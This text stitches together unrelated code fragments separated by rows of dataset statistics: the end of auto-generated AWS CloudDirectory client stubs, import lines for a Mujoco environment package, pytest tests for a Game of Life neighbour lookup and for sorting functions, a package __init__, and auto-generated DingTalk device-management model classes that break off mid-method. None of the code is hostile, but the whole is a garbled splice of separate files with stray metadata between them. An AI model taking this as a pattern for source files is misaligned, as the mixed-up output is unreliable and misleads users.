CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.FacetValidationException
:return: {
'ObjectIdentifier': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.DirectoryNotEnabledException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.LinkNameAlreadyInUseException
CloudDirectory.Client.exceptions.FacetValidationException
"""
pass
def update_schema(SchemaArn=None, Name=None):
"""
Updates the schema name with a new name. Only development schema names can be updated.
See also: AWS API Documentation
Exceptions
:example: response = client.update_schema(
SchemaArn='string',
Name='string'
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) of the development schema. For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe name of the schema.\n
:rtype: dict
ReturnsResponse Syntax
{
'SchemaArn': 'string'
}
Response Structure
(dict) --
SchemaArn (string) --
The ARN that is associated with the updated schema. For more information, see arns .
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
:return: {
'SchemaArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
"""
pass
def update_typed_link_facet(SchemaArn=None, Name=None, AttributeUpdates=None, IdentityAttributeOrder=None):
"""
Updates a TypedLinkFacet . For more information, see Typed Links .
See also: AWS API Documentation
Exceptions
:example: response = client.update_typed_link_facet(
SchemaArn='string',
Name='string',
AttributeUpdates=[
{
'Attribute': {
'Name': 'string',
'Type': 'STRING'|'BINARY'|'BOOLEAN'|'NUMBER'|'DATETIME'|'VARIANT',
'DefaultValue': {
'StringValue': 'string',
'BinaryValue': b'bytes',
'BooleanValue': True|False,
'NumberValue': 'string',
'DatetimeValue': datetime(2015, 1, 1)
},
'IsImmutable': True|False,
'Rules': {
'string': {
'Type': 'BINARY_LENGTH'|'NUMBER_COMPARISON'|'STRING_FROM_SET'|'STRING_LENGTH',
'Parameters': {
'string': 'string'
}
}
},
'RequiredBehavior': 'REQUIRED_ALWAYS'|'NOT_REQUIRED'
},
'Action': 'CREATE_OR_UPDATE'|'DELETE'
},
],
IdentityAttributeOrder=[
'string',
]
)
:type SchemaArn: string
:param SchemaArn: [REQUIRED]\nThe Amazon Resource Name (ARN) that is associated with the schema. For more information, see arns .\n
:type Name: string
:param Name: [REQUIRED]\nThe unique name of the typed link facet.\n
:type AttributeUpdates: list
:param AttributeUpdates: [REQUIRED]\nAttributes update structure.\n\n(dict) --A typed link facet attribute update.\n\nAttribute (dict) -- [REQUIRED]The attribute to update.\n\nName (string) -- [REQUIRED]The unique name of the typed link attribute.\n\nType (string) -- [REQUIRED]The type of the attribute.\n\nDefaultValue (dict) --The default value of the attribute (if configured).\n\nStringValue (string) --A string data value.\n\nBinaryValue (bytes) --A binary data value.\n\nBooleanValue (boolean) --A Boolean data value.\n\nNumberValue (string) --A number data value.\n\nDatetimeValue (datetime) --A date and time value.\n\n\n\nIsImmutable (boolean) --Whether the attribute is mutable or not.\n\nRules (dict) --Validation rules that are attached to the attribute definition.\n\n(string) --\n(dict) --Contains an Amazon Resource Name (ARN) and parameters that are associated with the rule.\n\nType (string) --The type of attribute validation rule.\n\nParameters (dict) --The minimum and maximum parameters that are associated with the rule.\n\n(string) --\n(string) --\n\n\n\n\n\n\n\n\n\n\nRequiredBehavior (string) -- [REQUIRED]The required behavior of the TypedLinkAttributeDefinition .\n\n\n\nAction (string) -- [REQUIRED]The action to perform when updating the attribute.\n\n\n\n\n
:type IdentityAttributeOrder: list
:param IdentityAttributeOrder: [REQUIRED]\nThe order of identity attributes for the facet, from most significant to least significant. The ability to filter typed links considers the order that the attributes are defined on the typed link facet. When providing ranges to a typed link selection, any inexact ranges must be specified at the end. Any attributes that do not have a range specified are presumed to match the entire range. Filters are interpreted in the order of the attributes on the typed link facet, not the order in which they are supplied to any API calls. For more information about identity attributes, see Typed Links .\n\n(string) --\n\n
:rtype: dict
ReturnsResponse Syntax
{}
Response Structure
(dict) --
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.LimitExceededException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.FacetValidationException
CloudDirectory.Client.exceptions.InvalidFacetUpdateException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.FacetNotFoundException
CloudDirectory.Client.exceptions.InvalidRuleException
:return: {}
:returns:
(dict) --
"""
pass
def upgrade_applied_schema(PublishedSchemaArn=None, DirectoryArn=None, DryRun=None):
"""
Upgrades a single directory in-place using the PublishedSchemaArn with schema updates found in MinorVersion . Backwards-compatible minor version upgrades are instantaneously available for readers on all objects in the directory. Note: This is a synchronous API call and upgrades only one schema on a given directory per call. To upgrade multiple directories from one schema, you would need to call this API on each directory.
See also: AWS API Documentation
Exceptions
:example: response = client.upgrade_applied_schema(
PublishedSchemaArn='string',
DirectoryArn='string',
DryRun=True|False
)
:type PublishedSchemaArn: string
:param PublishedSchemaArn: [REQUIRED]\nThe revision of the published schema to upgrade the directory to.\n
:type DirectoryArn: string
:param DirectoryArn: [REQUIRED]\nThe ARN for the directory to which the upgraded schema will be applied.\n
:type DryRun: boolean
:param DryRun: Used for testing whether the major version schemas are backward compatible or not. If schema compatibility fails, an exception would be thrown else the call would succeed but no changes will be saved. This parameter is optional.
:rtype: dict
ReturnsResponse Syntax
{
'UpgradedSchemaArn': 'string',
'DirectoryArn': 'string'
}
Response Structure
(dict) --
UpgradedSchemaArn (string) --
The ARN of the upgraded schema that is returned as part of the response.
DirectoryArn (string) --
The ARN of the directory that is returned as part of the response.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.IncompatibleSchemaException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
:return: {
'UpgradedSchemaArn': 'string',
'DirectoryArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.IncompatibleSchemaException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.SchemaAlreadyExistsException
"""
pass
def upgrade_published_schema(DevelopmentSchemaArn=None, PublishedSchemaArn=None, MinorVersion=None, DryRun=None):
"""
Upgrades a published schema under a new minor version revision using the current contents of DevelopmentSchemaArn .
See also: AWS API Documentation
Exceptions
:example: response = client.upgrade_published_schema(
DevelopmentSchemaArn='string',
PublishedSchemaArn='string',
MinorVersion='string',
DryRun=True|False
)
:type DevelopmentSchemaArn: string
:param DevelopmentSchemaArn: [REQUIRED]\nThe ARN of the development schema with the changes used for the upgrade.\n
:type PublishedSchemaArn: string
:param PublishedSchemaArn: [REQUIRED]\nThe ARN of the published schema to be upgraded.\n
:type MinorVersion: string
:param MinorVersion: [REQUIRED]\nIdentifies the minor version of the published schema that will be created. This parameter is NOT optional.\n
:type DryRun: boolean
:param DryRun: Used for testing whether the Development schema provided is backwards compatible, or not, with the publish schema provided by the user to be upgraded. If schema compatibility fails, an exception would be thrown else the call would succeed. This parameter is optional and defaults to false.
:rtype: dict
ReturnsResponse Syntax
{
'UpgradedSchemaArn': 'string'
}
Response Structure
(dict) --
UpgradedSchemaArn (string) --
The ARN of the upgraded schema that is returned as part of the response.
Exceptions
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.IncompatibleSchemaException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.LimitExceededException
:return: {
'UpgradedSchemaArn': 'string'
}
:returns:
CloudDirectory.Client.exceptions.InternalServiceException
CloudDirectory.Client.exceptions.InvalidArnException
CloudDirectory.Client.exceptions.RetryableConflictException
CloudDirectory.Client.exceptions.ValidationException
CloudDirectory.Client.exceptions.IncompatibleSchemaException
CloudDirectory.Client.exceptions.AccessDeniedException
CloudDirectory.Client.exceptions.ResourceNotFoundException
CloudDirectory.Client.exceptions.InvalidAttachmentException
CloudDirectory.Client.exceptions.LimitExceededException
"""
pass
| 42.739367
| 31,246
| 0.668804
| 39,622
| 361,746
| 6.096335
| 0.023093
| 0.066488
| 0.099731
| 0.004686
| 0.93439
| 0.924367
| 0.912171
| 0.895996
| 0.887985
| 0.879225
| 0
| 0.00381
| 0.25477
| 361,746
| 8,463
| 31,247
| 42.744417
| 0.892197
| 0.970427
| 0
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0.5
| 0
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 10
|
5b828d9be61d9ffde99e3287c80a06730df0311d
| 234
|
py
|
Python
|
BOReL/environments/mujoco/rand_param_envs/gym/envs/parameter_tuning/__init__.py
|
hai-h-nguyen/pomdp-baselines
|
629180d56641810d99653a116cca41ede65172eb
|
[
"MIT"
] | 40
|
2021-10-15T14:53:00.000Z
|
2022-03-31T02:27:20.000Z
|
BOReL/environments/mujoco/rand_param_envs/gym/envs/parameter_tuning/__init__.py
|
hai-h-nguyen/pomdp-baselines
|
629180d56641810d99653a116cca41ede65172eb
|
[
"MIT"
] | 1
|
2022-03-13T04:02:30.000Z
|
2022-03-13T04:02:30.000Z
|
BOReL/environments/mujoco/rand_param_envs/gym/envs/parameter_tuning/__init__.py
|
hai-h-nguyen/pomdp-baselines
|
629180d56641810d99653a116cca41ede65172eb
|
[
"MIT"
] | 5
|
2021-11-28T04:08:13.000Z
|
2022-03-17T02:33:51.000Z
|
from environments.mujoco.rand_param_envs.gym.envs.parameter_tuning.convergence import (
ConvergenceControl,
)
from environments.mujoco.rand_param_envs.gym.envs.parameter_tuning.train_deep_cnn import (
CNNClassifierTraining,
)
| 33.428571
| 90
| 0.837607
| 28
| 234
| 6.714286
| 0.571429
| 0.170213
| 0.234043
| 0.276596
| 0.606383
| 0.606383
| 0.606383
| 0.606383
| 0.606383
| 0.606383
| 0
| 0
| 0.08547
| 234
| 6
| 91
| 39
| 0.878505
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.333333
| 0
| 0.333333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
5bce4c8d17cf5825c4882b9958da62664551b8df
| 9,600
|
py
|
Python
|
life/test_sparse_set_state.py
|
freesurfer-rge/simple-life
|
aab5d11dabb05036bb88569130ebf7493d7d843a
|
[
"MIT"
] | null | null | null |
life/test_sparse_set_state.py
|
freesurfer-rge/simple-life
|
aab5d11dabb05036bb88569130ebf7493d7d843a
|
[
"MIT"
] | null | null | null |
life/test_sparse_set_state.py
|
freesurfer-rge/simple-life
|
aab5d11dabb05036bb88569130ebf7493d7d843a
|
[
"MIT"
] | null | null | null |
import pytest
from typing import List, Set, Tuple
from .sparse_set_state import SparseSetState
class TestGetNeighboursNoWrap:
    """Neighbour lookup on a 3x3 board with no wrapping at the edges."""

    def check_neighbours(
        self, actual: List[Tuple[int, int]], expected: Set[Tuple[int, int]]
    ):
        assert isinstance(actual, list)
        # Neighbour ordering is unspecified, so compare as sets
        assert set(actual) == expected

    @pytest.mark.parametrize(
        "cell,expected",
        [
            ((0, 0), {(0, 1), (1, 1), (1, 0)}),
            ((2, 2), {(1, 2), (1, 1), (2, 1)}),
            ((0, 2), {(1, 2), (1, 1), (0, 1)}),
            ((2, 0), {(2, 1), (1, 1), (1, 0)}),
        ],
        ids=["(0,0)", "(2,2)", "(0,2)", "(2,0)"],
    )
    def test_get_neighbours_corner(self, cell, expected):
        # The set of active cells is irrelevant to neighbour lookup
        state = SparseSetState({})
        neighbours = state.get_neighbours(cell, 3, 3)
        self.check_neighbours(neighbours, expected)

    @pytest.mark.parametrize(
        "cell, expected",
        [
            ((1, 0), {(0, 0), (0, 1), (1, 1), (2, 1), (2, 0)}),
            ((0, 1), {(0, 0), (1, 0), (1, 1), (1, 2), (0, 2)}),
            ((1, 2), {(0, 2), (0, 1), (1, 1), (2, 1), (2, 2)}),
            ((2, 1), {(2, 0), (1, 0), (1, 1), (1, 2), (2, 2)}),
        ],
        ids=["(1,0)", "(0,1)", "(1,2)", "(2,1)"],
    )
    def test_get_neighbours_edge(self, cell, expected):
        # The set of active cells is irrelevant to neighbour lookup
        state = SparseSetState({})
        neighbours = state.get_neighbours(cell, 3, 3)
        self.check_neighbours(neighbours, expected)

    def test_get_neighbours_centre(self):
        # The centre of a 3x3 board neighbours every other cell
        state = SparseSetState({})
        neighbours = state.get_neighbours((1, 1), 3, 3)
        expected = {(i, j) for i in range(3) for j in range(3)} - {(1, 1)}
        self.check_neighbours(neighbours, expected)
class TestGetNeighboursWrap3x3:
    """Neighbour lookup on a 3x3 board with wrapping in both directions."""

    def check_neighbours(
        self, actual: List[Tuple[int, int]], expected: Set[Tuple[int, int]]
    ):
        assert isinstance(actual, list)
        # Neighbour ordering is unspecified, so compare as sets
        assert set(actual) == expected

    @pytest.mark.parametrize(
        "cell",
        [(0, 0), (2, 2), (0, 2), (2, 0)],
        ids=["(0,0)", "(2,2)", "(0,2)", "(2,0)"],
    )
    def test_get_neighbours_corner(self, cell):
        nx, ny = 3, 3
        # Active cells are irrelevant to neighbour lookup
        state = SparseSetState({})
        # With wrapping, every cell on a 3x3 board neighbours every other cell
        expected: Set[Tuple[int, int]] = {
            (i, j) for i in range(nx) for j in range(ny) if (i, j) != cell
        }
        neighbours = state.get_neighbours(cell, nx, ny, x_wrap=True, y_wrap=True)
        self.check_neighbours(neighbours, expected)

    @pytest.mark.parametrize(
        "cell",
        [(0, 1), (1, 0), (2, 1), (1, 2)],
        ids=["(0,1)", "(1,0)", "(2,1)", "(1,2)"],
    )
    def test_get_neighbours_edge(self, cell):
        nx, ny = 3, 3
        # Active cells are irrelevant to neighbour lookup
        state = SparseSetState({})
        # With wrapping, every cell on a 3x3 board neighbours every other cell
        expected: Set[Tuple[int, int]] = {
            (i, j) for i in range(nx) for j in range(ny) if (i, j) != cell
        }
        neighbours = state.get_neighbours(cell, nx, ny, x_wrap=True, y_wrap=True)
        self.check_neighbours(neighbours, expected)

    def test_get_neighbours_centre(self):
        # The centre cell's neighbourhood is unaffected by wrapping
        state = SparseSetState({})
        neighbours = state.get_neighbours((1, 1), 3, 3, x_wrap=True, y_wrap=True)
        expected = {(i, j) for i in range(3) for j in range(3)} - {(1, 1)}
        self.check_neighbours(neighbours, expected)
class TestGetNeighboursWrap5x5:
    """Neighbour lookup on a 5x5 board with wrapping in both directions."""

    def fetch_neighbours(self, target_cell: Tuple[int, int]):
        # Active cells are irrelevant; only the board geometry matters
        state = SparseSetState({})
        return state.get_neighbours(target_cell, 5, 5, x_wrap=True, y_wrap=True)

    def check_neighbours(
        self, actual: List[Tuple[int, int]], expected: Set[Tuple[int, int]]
    ):
        assert isinstance(actual, list)
        # With wrapping, every cell always has exactly 8 neighbours
        assert len(expected) == 8
        assert len(actual) == 8
        # Neighbour ordering is unspecified, so compare as sets
        assert set(actual) == expected

    def test_check_centre(self):
        # Interior cell: no wrapping involved
        actual = self.fetch_neighbours(target_cell=(2, 2))
        expected = {
            (1, 1), (2, 1), (3, 1),
            (1, 2),         (3, 2),
            (1, 3), (2, 3), (3, 3),
        }
        self.check_neighbours(actual, expected)

    @pytest.mark.parametrize(
        "cell,expected",
        [
            ((2, 1), {(1, 0), (2, 0), (3, 0), (1, 1), (3, 1), (1, 2), (2, 2), (3, 2)}),
            ((1, 2), {(0, 1), (0, 2), (0, 3), (1, 1), (1, 3), (2, 1), (2, 2), (2, 3)}),
            ((2, 3), {(1, 2), (2, 2), (3, 2), (1, 3), (3, 3), (1, 4), (2, 4), (3, 4)}),
            ((3, 2), {(2, 1), (2, 2), (2, 3), (3, 1), (3, 3), (4, 1), (4, 2), (4, 3)}),
        ],
        ids=["(2,1)", "(1,2)", "(2,3)", "(3,2)"],
    )
    def test_touch_edge(self, cell, expected):
        # Cells one step inside the border: neighbourhood touches but
        # does not cross an edge
        self.check_neighbours(self.fetch_neighbours(cell), expected)

    @pytest.mark.parametrize(
        "cell,expected",
        [
            ((2, 0), {(1, 4), (2, 4), (3, 4), (1, 0), (3, 0), (1, 1), (2, 1), (3, 1)}),
            ((0, 2), {(4, 1), (4, 2), (4, 3), (0, 1), (0, 3), (1, 1), (1, 2), (1, 3)}),
            ((2, 4), {(1, 3), (2, 3), (3, 3), (1, 4), (3, 4), (1, 0), (2, 0), (3, 0)}),
            ((4, 2), {(3, 1), (3, 2), (3, 3), (4, 1), (4, 3), (0, 1), (0, 2), (0, 3)}),
        ],
        ids=["(2,0)", "(0,2)", "(2,4)", "(4,2)"],
    )
    def test_overlap_edge(self, cell, expected):
        # Border (non-corner) cells: neighbourhood wraps across one edge
        self.check_neighbours(self.fetch_neighbours(cell), expected)

    @pytest.mark.parametrize(
        "cell,expected",
        [
            ((0, 0), {(4, 4), (0, 4), (1, 4), (4, 0), (1, 0), (4, 1), (0, 1), (1, 1)}),
            ((0, 4), {(4, 3), (0, 3), (1, 3), (4, 4), (1, 4), (4, 0), (0, 0), (1, 0)}),
            ((4, 0), {(3, 4), (4, 4), (0, 4), (3, 0), (0, 0), (3, 1), (4, 1), (0, 1)}),
            ((4, 4), {(3, 3), (4, 3), (0, 3), (3, 4), (0, 4), (3, 0), (4, 0), (0, 0)}),
        ],
        ids=["(0,0)", "(0,4)", "(4,0)", "(4,4)"],
    )
    def test_overlap_corner(self, cell, expected):
        # Corner cells: neighbourhood wraps across both edges
        self.check_neighbours(self.fetch_neighbours(cell), expected)
| 27.195467
| 78
| 0.328542
| 936
| 9,600
| 3.301282
| 0.086538
| 0.023301
| 0.013592
| 0.080906
| 0.818447
| 0.786731
| 0.741748
| 0.712621
| 0.705178
| 0.693204
| 0
| 0.096586
| 0.517917
| 9,600
| 352
| 79
| 27.272727
| 0.571089
| 0.052292
| 0
| 0.71246
| 0
| 0
| 0.023555
| 0
| 0
| 0
| 0
| 0
| 0.025559
| 1
| 0.044728
| false
| 0
| 0.009585
| 0
| 0.067093
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
5bd0d8b704e199534360d6348b4da93478ee2035
| 3,162
|
py
|
Python
|
test/test_algs.py
|
jessicagainesbmi203/example
|
94aac309e2e8f217edd1d45ffde10b586db0a6a7
|
[
"Apache-2.0"
] | null | null | null |
test/test_algs.py
|
jessicagainesbmi203/example
|
94aac309e2e8f217edd1d45ffde10b586db0a6a7
|
[
"Apache-2.0"
] | null | null | null |
test/test_algs.py
|
jessicagainesbmi203/example
|
94aac309e2e8f217edd1d45ffde10b586db0a6a7
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
from example import algs
def test_pointless_sort():
    """pointless_sort must ignore its input and always return [1, 2, 3]."""
    # Two independent random inputs should produce the same fixed output
    for _ in range(2):
        vec = np.random.rand(10)
        assert np.array_equal(algs.pointless_sort(vec), np.array([1, 2, 3]))
def test_bubblesort():
    """Exercise bubblesort over the usual edge cases.

    Covers odd/even lengths, the empty vector, a single element,
    all-duplicate values, and character (string) elements.
    """
    cases = [
        ([1, 2, 4, 0, 1], [0, 1, 1, 2, 4]),            # odd length
        ([1, 2, 4, 0], [0, 1, 2, 4]),                  # even length
        ([], []),                                      # empty vector
        ([7], [7]),                                    # single element
        ([1, 1, 1, 1], [1, 1, 1, 1]),                  # duplicated elements
        (['b', 'd', 'a', 'c'], ['a', 'b', 'c', 'd']),  # characters
    ]
    for data, want in cases:
        result = algs.bubblesort(np.array(data))['sorted']
        assert np.array_equal(result, np.array(want))
def test_quicksort():
    """Exercise quicksort over the same edge cases as test_bubblesort.

    Covers odd/even lengths, the empty vector, a single element,
    all-duplicate values, and character (string) elements.
    """
    # test odd length
    x = np.array([1, 2, 4, 0, 3])
    assert np.array_equal(algs.quicksort(x)['sorted'], np.array([0, 1, 2, 3, 4]))
    # test even length
    x = np.array([1, 2, 4, 0])
    assert np.array_equal(algs.quicksort(x)['sorted'], np.array([0, 1, 2, 4]))
    # test empty vector
    x = np.array([])
    assert np.array_equal(algs.quicksort(x)['sorted'], np.array([]))
    # test single element vector
    x = np.array([7])
    assert np.array_equal(algs.quicksort(x)['sorted'], np.array([7]))
    # test duplicated elements -- this assertion was previously commented
    # out, which built the input but silently checked nothing. Re-enabled
    # so a quicksort defect on duplicate keys is surfaced, not hidden.
    x = np.array([1, 1, 1, 1])
    assert np.array_equal(algs.quicksort(x)['sorted'], np.array([1, 1, 1, 1]))
    # test characters
    x = np.array(['b', 'd', 'a', 'c'])
    assert np.array_equal(algs.quicksort(x)['sorted'], np.array(['a', 'b', 'c', 'd']))
def test_insertionsort():
    """Exercise insertionsort over the usual edge cases.

    Covers odd/even lengths, the empty vector, a single element,
    all-duplicate values, and character (string) elements.
    """
    cases = [
        ([1, 2, 4, 0, 3], [0, 1, 2, 3, 4]),            # odd length
        ([1, 2, 4, 0], [0, 1, 2, 4]),                  # even length
        ([], []),                                      # empty vector
        ([7], [7]),                                    # single element
        ([1, 1, 1, 1], [1, 1, 1, 1]),                  # duplicated elements
        (['b', 'd', 'a', 'c'], ['a', 'b', 'c', 'd']),  # characters
    ]
    for data, want in cases:
        result = algs.insertionsort(np.array(data))['sorted']
        assert np.array_equal(result, np.array(want))
| 39.525
| 90
| 0.627767
| 527
| 3,162
| 3.711575
| 0.13852
| 0.207566
| 0.132924
| 0.184049
| 0.836912
| 0.836912
| 0.836912
| 0.836912
| 0.834867
| 0.834867
| 0
| 0.041106
| 0.176787
| 3,162
| 80
| 90
| 39.525
| 0.710334
| 0.26692
| 0
| 0.466667
| 1
| 0
| 0.054998
| 0
| 0
| 0
| 0
| 0
| 0.422222
| 1
| 0.088889
| false
| 0
| 0.044444
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
7506ac14fbe9c06879aae568a17039aa31289a72
| 108
|
py
|
Python
|
nn4mc/__init__.py
|
RS-Coop/Correll_Lab
|
7c9ea0ff0ce3f54848a0eb112ef29b28d8e735e5
|
[
"MIT"
] | 4
|
2021-05-31T23:49:39.000Z
|
2022-03-16T12:27:08.000Z
|
nn4mc/__init__.py
|
RS-Coop/Correll_Lab
|
7c9ea0ff0ce3f54848a0eb112ef29b28d8e735e5
|
[
"MIT"
] | 1
|
2021-10-02T19:51:01.000Z
|
2022-01-20T21:45:37.000Z
|
nn4mc/__init__.py
|
correlllab/nn4mc_py
|
24fa3f9187f7d89692041b640c48f91c2a77b644
|
[
"MIT"
] | null | null | null |
from .analysis import * #Should be available to user
from .translator import * #Should be available to user
| 36
| 54
| 0.777778
| 16
| 108
| 5.25
| 0.5625
| 0.285714
| 0.333333
| 0.547619
| 0.690476
| 0.690476
| 0
| 0
| 0
| 0
| 0
| 0
| 0.166667
| 108
| 2
| 55
| 54
| 0.933333
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7536ee82020868636edd7b1cf06d76ef865dc693
| 43,012
|
py
|
Python
|
dingtalk/python/alibabacloud_dingtalk/diot_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 15
|
2020-08-27T04:10:26.000Z
|
2022-03-07T06:25:42.000Z
|
dingtalk/python/alibabacloud_dingtalk/diot_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 1
|
2020-09-27T01:30:46.000Z
|
2021-12-29T09:15:34.000Z
|
dingtalk/python/alibabacloud_dingtalk/diot_1_0/models.py
|
aliyun/dingtalk-sdk
|
ab4f856b8cfe94f6b69f10a0730a2e5a7d4901c5
|
[
"Apache-2.0"
] | 5
|
2020-08-27T04:07:44.000Z
|
2021-12-03T02:55:20.000Z
|
# -*- coding: utf-8 -*-
# This file is auto-generated, don't edit it. Thanks.
from Tea.model import TeaModel
from typing import Dict, List, Any
class BatchDeleteDeviceHeaders(TeaModel):
    """Request headers for the BatchDeleteDevice API (auto-generated model)."""
    def __init__(
        self,
        common_headers: Dict[str, str] = None,
        x_acs_dingtalk_access_token: str = None,
    ):
        # Additional common headers to send with the request.
        self.common_headers = common_headers
        # DingTalk access token, sent as 'x-acs-dingtalk-access-token'.
        self.x_acs_dingtalk_access_token = x_acs_dingtalk_access_token
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.common_headers is not None:
            result['commonHeaders'] = self.common_headers
        if self.x_acs_dingtalk_access_token is not None:
            result['x-acs-dingtalk-access-token'] = self.x_acs_dingtalk_access_token
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('commonHeaders') is not None:
            self.common_headers = m.get('commonHeaders')
        if m.get('x-acs-dingtalk-access-token') is not None:
            self.x_acs_dingtalk_access_token = m.get('x-acs-dingtalk-access-token')
        return self
class BatchDeleteDeviceRequest(TeaModel):
    """Request body for the BatchDeleteDevice API (auto-generated model)."""
    def __init__(
        self,
        corp_id: str = None,
        device_ids: List[str] = None,
    ):
        # DingTalk IoT organization ID; required for third-party platforms,
        # ignored for in-house enterprise systems.
        self.corp_id = corp_id
        # Device ID list, at most 500 entries.
        self.device_ids = device_ids
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.corp_id is not None:
            result['corpId'] = self.corp_id
        if self.device_ids is not None:
            result['deviceIds'] = self.device_ids
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('corpId') is not None:
            self.corp_id = m.get('corpId')
        if m.get('deviceIds') is not None:
            self.device_ids = m.get('deviceIds')
        return self
class BatchDeleteDeviceResponseBody(TeaModel):
    """Response body for the BatchDeleteDevice API (auto-generated model)."""
    def __init__(
        self,
        device_ids: List[str] = None,
    ):
        # IDs of the devices that were successfully deleted.
        self.device_ids = device_ids
    def validate(self):
        """No field constraints to validate."""
        pass
    def to_map(self):
        """Serialize to a plain dict, skipping fields that are None."""
        _map = super().to_map()
        if _map is not None:
            return _map
        result = dict()
        if self.device_ids is not None:
            result['deviceIds'] = self.device_ids
        return result
    def from_map(self, m: dict = None):
        """Populate fields from a plain dict and return self."""
        m = m or dict()
        if m.get('deviceIds') is not None:
            self.device_ids = m.get('deviceIds')
